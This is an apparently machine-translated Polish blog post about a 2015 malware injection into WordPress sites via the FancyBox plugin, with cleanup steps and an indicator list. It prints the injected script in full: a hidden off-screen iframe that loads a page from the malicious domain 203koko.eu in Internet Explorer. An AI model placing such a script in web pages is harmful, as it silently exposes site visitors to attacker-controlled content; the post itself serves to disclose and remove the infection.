Wcześniej w tym tygodniu liczba stron internetowych i blogów WordPress, otrzymałem ostrzeżenia od infekcji złośliwym oprogramowaniem przez Webmasterzy Google.
Problemem, który Webmasterzy Google odnieść, jest obecność kod / scenariusz iframe malware strony internetowe źródła.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Wydaje się, że jest to wrażliwość a wtyczkadorobek FancyBox dla WordPress które do wczoraj (05.02.2015) nie zostały zaktualizowane przez długi czas.
Rozwiązanie tego problemu i dezynfekcji wirusy strony z tym złośliwym oprogramowaniem jest stosunkowo proste.
1. Wyłącz wtyczkę FancyBox.
2. Usuń wszystkie pliki wtyczki FancyBox z serwera (przez FTP)
3. Zainstaluj nową wersję wtyczki (Fancybox 3.0.4)
FancyBox dla WordPress 3.0.4
- Zmieniono nazwę ustawienia, którego dotyczy problem z zabezpieczeniami wymieniony w 3.0.3. Powinno to zapobiec pojawianiu się szkodliwego kodu w witrynach, na których znajduje się wtyczka updated bez usuwania złośliwego kodu.
FancyBox dla WordPress 3.0.3
- Naprawiono problem bezpieczeństwa.
Informacje o złośliwym oprogramowaniu:
TYP: przekierowania iframe
TARGET: WordPress Fantazyjne pudełko
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
ZŁOŚLIWE OPROGRAMOWANIE RAW KODY:
NAPISANE ZŁOŚLIWE OPROGRAMOWANIE: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Usuń złośliwe oprogramowanie ze swojego WordPress .